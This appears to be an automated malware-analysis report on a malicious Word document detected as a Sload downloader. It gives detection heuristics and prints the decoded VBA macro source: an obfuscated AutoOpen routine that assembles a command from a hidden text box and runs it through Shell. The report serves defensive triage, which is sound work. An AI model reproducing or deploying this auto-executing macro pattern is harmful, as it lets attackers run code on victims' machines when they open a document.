MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers a call to the 'Shell()' function, which in turn invokes 'cmd.exe'. This indicates the macro's intent is to execute a command-line utility, likely to download and execute a secondary payload. The ClamAV detection name 'Doc.Malware.Sload-6786414-0' suggests a downloader or trojan.
Heuristics 9
-
ClamAV: Doc.Malware.Sload-6786414-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sload-6786414-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
Set AEhltQmQiuArPkTmdufGUz = SCknDJdXldJzEqORr iRPEvzwis = Array(lYRDlPiIc, HBXOOGkP, OdoviPACw, Interaction.Shell(zHQuJL, iLqCdDYdTtA), oHakfAFr) Select Case aoGQDcEHhOwobACQClh -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() dcQzjdd -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12186 bytes |
SHA-256: d40d46f255496e0f1888f4f7ede362bf4488c40d3e19562a0154e3c0013e25f1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
323 of 371 identifiers look randomly generated (e.g. 'pCBAKYFbQnLUKDBHjFnwdEuG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "aEIWmSojc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
dcQzjdd
End Sub
Attribute VB_Name = "EUZAVSD"
Function dcQzjdd()
On Error Resume Next
Select Case iZjnkXHFKRkiFrAhjEKQhvN
Case 89979254
AEBhvCfdUMXqsNXVmRl = zhdzSLBSkMmLWPkT
XOPFBkidrormuui = Log(CXTaEPkANsIZLTcdEQP)
VFwwzUaWKfqSIj = 126102336
QtBHdPrIcESXMOiiibGzZWa = oNqhCpRbAkMLOHZGNqUvC
Case 18849596
vzLnhcVStSRTPZKF = 255231550
qWbBWPXBAjiBfjmDukrBjw = Log(RTtwoJjDkhHMfitavQfb)
krmljMiZOlDrrKidTisTjz = 131872132
UGUBKvkEXthbGLHzCiW = Log(EUoYKzcinIFmXOQasdPTAwUw)
End Select
Set HWHavRBbXTASvqMSCQOn = DsvjEZODwFApuDaVHsqDLAv
Select Case BifFGjRFpwhKoMjzCwZuIaia
Case 289892285
QAsdRTNdFGbWFr = zibfjnRiIWiuRnazFNBSRN
fNwLHaWjtiHLrHuL = Log(zRjHmZwqiGVIDYVjX)
RjcJIlplLKbjrKBlTAdEtoAV = 193849646
AYpJmbUMdcopJwRANl = uOLHSFVGTCdiHjokR
Case 316504694
XzPfhZzdqfmsaO = 45770465
EpQXERVBKztjJUNAELOOf = Log(ihVbibjJDTAzjvAYzGiNV)
fQUVRmoOAsCVLjCcmuUAv = 171036867
LkRzfNHkRNwBFHIJtUoS = Log(vOkRWVUjtUmFjJk)
End Select
Set nIAtHkIOhwUikbjHHYQWhhJr = AYsKwVwXKGLoZzKFVkZBqw
Select Case vllbrtdAhBvbjXiUPPsIjGN
Case 122741996
UvVOKmMKYrfiEERDaCuzB = CUJsvjbIpYSrWzHlWPiRIjC
KLbFIDSSibtBFSqdiQCHLMh = Log(vpjfRkkVRSikHVzlFz)
uDGjEZEjrivfzdHK = 131230296
nBwrXjnkFVMRQBMDmP = IcGMBsrWnkHALfOSzLDfXt
Case 131722029
iWaNtSuqrVLuhozwjN = 338981348
zVAlBjOrjjRPImdiRdcUqRIq = Log(UkJOEzKtUWNVpMKECG)
DvmvKSjCkiJjMKR = 217197341
FdikHVoQQJcRSPnKAmYipwwX = Log(ZOKpAKXfMzYcXwawfuIElROV)
End Select
Set MXtwIHhGmhGdaPwElG = PicqwjKDnTMHzoTon
Select Case twpQzwijYzUMRlnwGH
Case 102344601
IEENZnPRwhTHnOfHc = wlLNdJjTjaRMltwNKotcrLi
mrdMYDFjULJiGubv = Log(GHpzkwaKZDrNzDmCwamj)
udUlrakSHPMwwkEtNC = 309397797
BzAOSUIWbHUpPG = iVOsWpsSnfPBSiIk
Case 158544896
cVucGSWRNrzvWjrYZYzKYNJ = 219578881
iDTpnSXwwmkRBOwV = Log(bBSrIfJuIklNSO)
NQXODbaYczXwGGYJ = 21203762
UlIPVZXJvfilijXYElqhSc = Log(cprkjCokaiZzdE)
End Select
Set uzrtjuprRrZiBnSVWrjfadoo = HvHDJiuTGqsqYwH
Select Case cFLvwQsoMIktChPzhKMCAdit
Case 142130463
OhrMmqRNcoqcMJzcdtuo = sMaOEwNwwWSaVB
zzWtcpFaGEwDEXAp = Log(hYVVQwirEOiSYCqHmfdXALOn)
UJFvIawjTszjpjBoCYaaI = 226254778
IvRsXSwVJhkvoc = vnflEKtbzwbiznoMdlHzAqib
Case 95889819
WnwElMMHcmvWdrOUTt = 313396503
AiVVGJhfvEFEXjnGcsNOW = Log(KBRGIPijXofiUoRdwbfjLYh)
ztEIrajhNJXTDABRwPhQZs = 102893785
ozumipimUbHOLaowIwRKRwaw = Log(NkwqQRHdFUrjtwXikzb)
End Select
Set mFWalHaaFjpZwMUFiwDKzlG = wPOAufhzwFnINVE
Select Case QDCJhczAjjViEb
Case 143016142
pFwonpnjWYSvcPOrMmv = wONBMwPcsTvpRzsLhGNaPVnJ
DXRRiVRfXibrzcoa = Log(oCddidWDKGZVibaE)
IbzKNwdJuVQTjiZzEjkfjZu = 310609335
TPsJoDAnFTMcAaEA = jIFkabAVduqYLijCwu
Case 232191848
zGSQfiKMXEFjfMplpdtns = 261812726
JKOtlfZDjUPUdqpE = Log(RnwZoKszsuNTAvsMvJFRkZjz)
ZLQsMvzZzWEpkU = 480208
uskMkjZXHihjnLsHBY = Log(wcHjzNuDZnWKoFvqj)
End Select
Set kQsmskdOPlmiznLFBtmLlzpd = jkXsdsULMQIWMkXCkzIQvqjw
Const iLqCdDYdTtA = 0
Select Case iuIfbHYrJvfLdIkrzM
Case 205488719
bASSBANsBOijXO = LqPfquPZMwDlFIzKmjduibp
atfquRzoORZBhjpHLaGW = Log(PIjDErwtTIjAlFwPYfuwOWnj)
cFuWjHUTfLkwmqZCuvIpBwbs = 291903486
vMZjsUAHclCWkBPjGtMSlo = uTbftujiCivLIuwSPw
Case 203311031
nzYKGZUqhjZBGqiPR = 274324955
NvHAsopHmJbwWHa = Log(uvQYTaqwVEuFRPjAZqRSf)
fWRShjGjDujIjUBRmnFLiotk = 275180532
dbWfpHCvQtHBsJpmAA = Log(IfLzIEiMTVqchcJCfMX)
End Select
Set YGoDHKkuvVrntLj = RcObKuiZZQZYiHKZcvACqIr
Select Case BXfbdAOGYcmLsmLRQbSj
Case 261799263
zmSHJjjuSDrivnwZfj = BBBzliutKAuprs
XtJWriXiJjTOqXTqwihmR = Log(ojdOmYtYOAlNPFPJsTiXrOSQ)
VrKwGJGQZEdtdv = 331645697
kVTcdHOamqOIuGaOMKRhj = HqizqAmQPYfnHswnaNc
Case 233760189
PvwVTiOjSdQAKNdw = 210253358
OoVbpcGzhQYjEFzPr = Log(jbXVXkwuPmziVpuvOvpoGVO)
wwHjZLBuViSEusQlfu = 89535893
BCujoIqEZDoKMCYZcN = Log(DlCImWqBVfEJLIuStD)
End Select
Set uRUwVSuHsrTqJRZKjzu = MwGVZVudCSkiVES
Select Case QFkiRsTmcfHVhVtv
Case 307686494
VXiICSEXiJTLiCNsshVEvF = jOMiinNKlYFICbHCRatOJTR
EIpdLZpsPdCuqk = Log(kQzhmYuKQkfDiBrkMwL)
WwkwLiMtZZMMhBJwKlfc = 69925403
YsjVLqYspzfGClfAWDLBlrXS = dssabRiSYZrSpXWUjj
Case 100504856
awXSJPbQJMhVNziwfSOf = 318498011
iLnijjpjEIIlviVaQMqRJL = Log(WEqoYoNUjkmTLfbivbcIZMb)
DdFCCpiiSTRipr = 115292893
qnZBJKJvoduqjDTJcnlujLS = Log(GIBsOztEJlRlnausTKNZvnz)
End Select
Set zHBCGWIfUfuAJQjrj = hvmhWBssbYztwSKmtGvrwn
Select Case orsHQajvBzZoSpApLDE
Case 282505209
muinEuVIiDTNHmm = ZHBzwCinwqGruENvHVBzNT
fNnWuFbKDNAlvDrG = Log(LrqOniOZqYGmloaFvVlKf)
hVfDdtSRrQOQlWczsjZzDh = 138347370
RYafAhFvFWJVjkAVHZj = XUCEcwdClikzAGlETmQKLT
Case 72425975
MHNIjEpiBfAwVVCCE = 20396994
XmKUcwvBUIViEJns = Log(kVThsFzVGoizjOGIJn)
CnlJnCUWfBvmidhRikbi = 214659491
zVJNEluPWuWLphzL = Log(fXjSUKCAUBwXYiJwpoPA)
End Select
Set zjcPfAQXnzSXEvGzufK = MkjzswMNOAtjKFh
Select Case hkrtDpaDELiDZwMMjbBWiKDW
Case 266655535
XoQjNwDALHCZzan = vztrCHjzZiazRXhVE
SmnXwizZlFKKdajLPFdzDPHQ = Log(iWEinahUAHAiXzL)
dWbpPFzPFIbsHtDfXPULvqz = 200392296
pdSjhrGRFatfbsZWpcfz = MGEUHIizwmYzMZbhfYQUaC
Case 124648348
zvXvpFNRfocWNOai = 185016491
InUiPSzoJEOiOKnuU = Log(liJqZHSXwETQwisI)
fqRjEwAwIDAZSiTuOztIROM = 106434761
VsVsGjmFQIDCfjkJuQERziV = Log(WjkzAbQdBoiFfECWOUCaQrjR)
End Select
Set wXwIwtrWVVWwmFo = aBqzfdpOhDdcvjfASrBESUD
Select Case YXJOftGWihLILBlXQzZPI
Case 234629743
UCSmzwBXPwsGjvPwKPjTYEd = mTSiTiNaodpLMGJYjKvJT
EbABPAZQUPZlAifWDlkSRDGD = Log(DFKmOJTNqPriSPNBYIZmaF)
tKGKZBiAUwPLuOdGGGXJ = 98890025
slVXQsuhRLzaRcHwuMMOWh = DSmvCTfCwQERVo
Case 9854687
mFniDNUzAwHMLzASKiRFi = 322620758
OmJBKMKmKscaIiDzqwouDLT = Log(zPmHmWwFpNZstMJlqMzTiWr)
HjbGqCpCTSCuZDAnwWlvI = 73130997
doCErOzIcXCADup = Log(mYXYbJPLmLJXMlwbw)
End Select
Set wSnwzoTJZWXDztGHwXlm = UZqRfEcvrbaEawWboaiF
Select Case NGQbwwSSXEtAanmDQtIuZmaK
Case 61912125
oCNEoorTfiBZooGA = zErfEsjBMtDVbf
SoHPFTPFIHIDCqF = Log(oZlcFRdjKdCcuozECu)
zjrvhiziYwojKHZ = 99145366
pCBAKYFbQnLUKDBHjFnwdEuG = FnVwsUUZAPztGoImURuoO
Case 91408091
nZaClSSlIvRFkjiXSquJoBN = 190374775
fKJmARUruhXRSiHhi = Log(wpjXCqtbzUEElLzlGHIwHdz)
qCGFAHnbKKOnjIIT = 294123468
TznpvLUhczZfjVrWjzj = Log(bqjcubwJEwwpFiJzZBGulT)
End Select
Set nCiatwKbJjEzdSLvTPKc = BjZAMtwfspCHLtZPADNu
Select Case wfNwNjlaVaASpJvKdbscnlpn
Case 185389874
GSjKaiqTiujZfBjFwAJENDX = OpdnLKqZUTaSqKzScVbB
DwqvhoodXjCvCwlECHXE = Log(FMbNPmBrcrcVDKs)
sdWBwzmXXnNNNZNDzVwkPi = 121258818
nmupaZzlsRKiBC = IZDqbYniDdYYhLIX
Case 66818363
UNKCzzwocVvOjBuK = 280281089
MsqdAHqLBARZjuAS = Log(oBFbGrnwSiptXdXVwKSU)
NCMmvzWClBNQUFJljGADjhZ = 4181934
iWuEljiwpawsoKtRu = Log(hccCYNjOERRKjcLUQbbz)
End Select
Set RfSfiKsuvGmmAsYobwhUXfQh = uWjUtSpwjPzKXtCrTIKf
Select Case HIwNDAwqkrTjZbcndltN
Case 304247821
BwfXiuNEviGADoESJjjLzZUf = cYwRpYQkIHCijWCdf
pZZXojKcKdiBbcAGBVRnGFqQ = Log(jCkcMjiRiiFrFkMGMNmCGfah)
VhLrpjiIcHhZAwwzkzz = 304882711
wlEhtsDNpBbCCqzWZ = uWiccfhMPqCWicnLZvHKvr
Case 206966133
nGFWzHwcKHDXfTJZzjdMLTS = 337503136
rRDPPtDropVZKPHta = Log(aZQfFmhKOOSjUoGH)
ptMvOAfrinApRVT = 244056264
rZzMMQiEfoZEVhS = Log(KRANQMZknbzjVz)
End Select
Set zwMzjIsdcirjLGnIGhlHDSX = iAOZkRBihvZFIkmvRoYjZdN
zHQuJL = aEIWmSojc.TextBox1 + BlfiO + fbrAlSE + CNvQuBp + mjTLwh + iYPjP + FJbQKHG + XLhaZKz
Select Case OZYXGowDbjtJMmU
Case 49085169
jdYVYviRpjNrcQNwbYvzwMV = zKJCzFvwWYqvdkpd
FQEjLwPjLlOYHvTHOYOmcTk = Log(PVEaSUriSFrwQalLuWmThZ)
cWnOMbqSljRUquoOq = 303555137
GCEXqonCsFhQGpGbDiFf = bnFPzGuRFIwZBSM
Case 162473876
zaZZzMEQKikSljkOYfOwIqhs = 241843866
zlqEXtDEjfGhdaBzocJzUY = Log(KcnwaqHsjoKOTZFG)
PjCFIrBowJBFjlTZZfckvcN = 169746649
ZsTMiZjVRjnVFBkmJdhFnz = Log(rptudWwmTcTjzi)
End Select
Set OjSjRBfDTdrwlzfUwcp = XpfFzVzUsmSlDiOwmEf
Select Case ipuZTkwzasFjiICFaaJVrSJo
Case 300817218
muiaOwdzYvnIaMr = LWJmwBIbJsCFFLfFf
zBVzdGCjkGRSzwib = Log(miGMkmCRWvYrNPi)
POpuLtCkPQBJrsGbiEsa = 164906672
NPSiGLipWrjqjhojvtcWzUls = ipwMIWHDRBaccmrFatJ
Case 174457019
IYnzIwwCAtdZIc = 145996085
cOUbmRjNESHkRWabSZVQJ = Log(zXJARIzCUJVXzfpwO)
sZtprNliSBHjHFYNOwRlAXQ = 13782088
wPtYumTKiYjWJjvPmpvvkCQw = Log(RshcqUJrqswrFYPnYcjor)
End Select
Set PVWNhUGOvzuodu = inDafTnzXhRjHLZjKtMcLG
Select Case hbAmHzXBlZbjNWiDaOdMdRul
Case 169169688
PubrhkJoNpQoUNtjIRP = MtrHjHHtSPjPNihcZ
rraZJpnltQTtIdWKMWDULad = Log(VzJAamjQKOZYpnkBU)
NqaZGCtCVLZFiRNKDMfmLGk = 20692003
uEwVYmBzQMmowqGHXQUrE = IKijYVhjHGXpMwvhzZXF
Case 118185926
bVHVZfnpPLiNvn = 283049092
NfRhFfRGdHLqTvTwODjIcC = Log(CwRrLKzCHqILrnkwvEBrRTwW)
rjzsEiMLjPkooGviFD = 341733605
kcKdFnEaKiizvXTi = Log(KDHvzIYAKHzGNMQwKjPVWnRi)
End Select
Set AEhltQmQiuArPkTmdufGUz = SCknDJdXldJzEqORr
iRPEvzwis = Array(lYRDlPiIc, HBXOOGkP, OdoviPACw, Interaction.Shell(zHQuJL, iLqCdDYdTtA), oHakfAFr)
Select Case aoGQDcEHhOwobACQClh
Case 172331586
kRwtXKrGfKcTOAsKbLh = iOHljwStRCQaaAqW
XfRMBCEUVMAKGbaz = Log(rVKLMZrwoctBsOJVz)
fPzhMDQLlSjLbp = 175857516
IVMwKFZOMZKScwqo = XvkTKIHuAoZPcBD
Case 178076662
FoIAtZpiUmswimcuFEuqr = 333007052
FEJRAzkYGrutBjFi = Log(vkpVOvSBzVXwJkrGbC)
jIpjkNlHotaNzZYuGIqrIrPC = 198639588
bzGCmZdJuNGBFIco = Log(IXHXXlqkwkLnrsmFWloA)
End Select
Set GAjqfKoFCiOUOHfWqEMQRo = SVDVTvjWonrBWXjraBfvCz
Select Case FLPkjVbqXmFjziWT
Case 280366757
hYYwRBGHvRWNcAVztw = AhQRwzQUDPifWVioKnJtOiZZ
UJKEKzpYWpnQHbwB = Log(CrRlzsuLLKjEjWIrHcoG)
tPpGAfuXDLLshciIY = 133193796
PswpFUmTfZzwKvRJb = izMAnIzYLCuZijIWqWu
Case 174050092
mNMOwDMAwQSGjtUFPFqqj = 55738879
ZFqQqnEuOBrsmzlpEmYPl = Log(TCpnRbRDkDicnJHmWMr)
EFoBiFdPlEItwzmobC = 145235633
cLRoOJMchSPLXQXNNoFM = Log(CRfvkdpWTLUqOtsoAmYtBhTo)
End Select
Set ViaYamwJjatltdjWFNHuUJWi = NBjSvUwrwOuPwtYXhiT
Select Case HqzNEJMuHPqzdWolIRcFsb
Case 309235249
EJwYMCnHnvPzdpaMuwjfI = IahQaBWbvfvLIv
nhFciMiHrISqPLuv = Log(cDAVqwbmkLzjCRhfA)
QbDZpZTqIILGQBk = 211493287
FuqzldqwAiXoqlLPEdTLD = aCAoTadvwwWiclJJf
Case 328297909
borvBRWzrMXRVfqT = 266593067
wKPUEkYSHJaGuwVzbZjGwWwb = Log(jbhBDlRUMinwGkHWjKNZkR)
vXERkhwZNoiVIrREXIl = 223036633
iwUpckPMiBBRCmdwU = Log(nOJZKYOwfRFpRzjJNZjbH)
End Select
Set jMimhEGEnFDbwTGInvadEzHt = ChtZEOsZpfwvXrKsadzmp
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.